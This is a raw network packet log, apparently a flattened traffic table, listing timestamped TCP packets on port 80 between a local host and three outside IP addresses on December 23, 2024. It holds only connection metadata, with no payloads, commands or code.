                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138334036 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138369083 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138392925 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138402939 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138437986 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138456106 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138473988 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138550043 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.258219004 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.258492947 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.258685112 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.330096006 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.330238104 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.330336094 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.334281921 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.334414005 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.334479094 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.342700005 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.342757940 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.342823982 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.350723982 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.350763083 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.350827932 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.359076977 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.359186888 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.359244108 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.367489100 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.367533922 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.367594004 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.375876904 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.375922918 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.375997066 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.384265900 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.384398937 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.384455919 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.392628908 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.392685890 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.392743111 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.401024103 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.401135921 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.401194096 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.409425974 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.409507990 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.409568071 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.522330046 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.522442102 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.522505999 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.524822950 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.524892092 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.524949074 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.529834032 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.529938936 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.530002117 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.534851074 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.535051107 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.535108089 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.539836884 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.539936066 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.539992094 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.544656992 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.544759989 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.544815063 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.557671070 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:27.576196909 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:27.695986032 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:27.696233034 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:27.709068060 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:27.829838037 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:27.829915047 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:27.829946041 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:27.829976082 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:27.830017090 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:27.830045938 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:27.830099106 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:27.830127954 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:27.830176115 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793070078 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793143988 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793183088 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793205023 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793219090 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793276072 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793277979 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793313026 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793349981 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793366909 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793384075 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793421030 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793431997 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793457985 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793504953 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.913270950 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.913326979 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.913384914 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.984904051 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.985066891 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.985136986 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.988941908 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.990519047 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.990557909 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.990573883 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.998872042 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.998929977 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.999087095 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.007445097 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.007496119 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.007500887 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.015719891 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.015769958 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.015949965 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.024131060 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.024224997 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.024317026 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.032525063 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.032560110 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.032586098 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.040868998 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.040954113 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.040996075 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.049282074 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.049345016 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.049432993 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.057775021 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.057828903 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.057832956 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.066080093 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.066137075 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.177160025 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.177217960 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.177268982 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.179377079 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.179481030 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.179529905 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.184825897 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.186803102 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.186853886 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.186872959 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.192166090 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.192219973 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.192246914 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.196932077 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.197036028 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.197133064 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.201831102 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.201885939 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.201889038 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.201946974 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:29.213943958 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:30.232429028 CET4977280192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:30.352365971 CET8049772192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:30.354386091 CET4977280192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:30.362442017 CET4977280192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:30.482065916 CET8049772192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:31.454972982 CET8049772192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:31.455065966 CET8049772192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:31.455127001 CET4977280192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:31.459285975 CET4977280192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:31.579051018 CET8049772192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:36.979907990 CET4978880192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:37.099641085 CET8049788209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:37.099749088 CET4978880192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:37.136024952 CET4978880192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:37.255553007 CET8049788209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:38.333717108 CET8049788209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:38.333818913 CET8049788209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:38.333889008 CET4978880192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:38.651418924 CET4978880192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:39.695234060 CET4979780192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:39.814897060 CET8049797209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:39.815006018 CET4979780192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:39.828026056 CET4979780192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:39.947648048 CET8049797209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:41.037542105 CET8049797209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:41.037683964 CET8049797209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:41.037761927 CET4979780192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:41.338779926 CET4979780192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:42.357245922 CET4980580192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:42.476826906 CET8049805209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:42.476994038 CET4980580192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:42.491025925 CET4980580192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:42.611046076 CET8049805209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:42.611063957 CET8049805209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:42.611078024 CET8049805209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:42.611104012 CET8049805209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:42.611116886 CET8049805209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:42.611129045 CET8049805209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:42.611157894 CET8049805209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:42.611171007 CET8049805209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:42.611202955 CET8049805209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:43.781328917 CET8049805209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:43.781451941 CET8049805209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:43.781516075 CET4980580192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:43.995249987 CET4980580192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:45.015999079 CET4981180192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:45.135936022 CET8049811209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:45.136044979 CET4981180192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:45.144273996 CET4981180192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:45.263863087 CET8049811209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:46.360881090 CET8049811209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:46.360932112 CET8049811209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:46.361068964 CET4981180192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:46.363363028 CET4981180192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:46.483402967 CET8049811209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:51.943233013 CET4982780192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:52.062951088 CET8049827202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:52.063040972 CET4982780192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:52.079603910 CET4982780192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:52.199156046 CET8049827202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:53.588933945 CET4982780192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:53.623078108 CET8049827202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:53.623152971 CET8049827202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:53.623162031 CET4982780192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:53.623250961 CET4982780192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:53.708475113 CET8049827202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:53.708543062 CET4982780192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:54.608516932 CET4983680192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:54.728281021 CET8049836202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:54.728419065 CET4983680192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:54.747037888 CET4983680192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:54.866746902 CET8049836202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:56.260634899 CET4983680192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:56.288230896 CET8049836202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:56.288280964 CET8049836202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:56.288315058 CET4983680192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:56.288331985 CET4983680192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:56.380611897 CET8049836202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:56.380680084 CET4983680192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.278979063 CET4984280192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.399087906 CET8049842202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.399370909 CET4984280192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.422233105 CET4984280192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.542071104 CET8049842202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.542114973 CET8049842202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.542172909 CET8049842202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.542202950 CET8049842202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.542232037 CET8049842202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.542267084 CET8049842202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.542341948 CET8049842202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.542376041 CET8049842202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.542428017 CET8049842202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:58.932562113 CET4984280192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:59.052788019 CET8049842202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:59.052877903 CET4984280192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:59.969162941 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:00.088838100 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:00.088954926 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:00.111288071 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:00.230952978 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789521933 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789597034 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789674044 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789711952 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789762974 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789799929 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789855003 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789855003 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789870024 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789908886 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789915085 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789948940 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789974928 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789988041 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.790038109 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.909727097 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.909939051 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.910190105 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.000837088 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.001070023 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.001163960 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.004992008 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.005109072 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.005194902 CET4985080192.168.2.4202.95.11.110
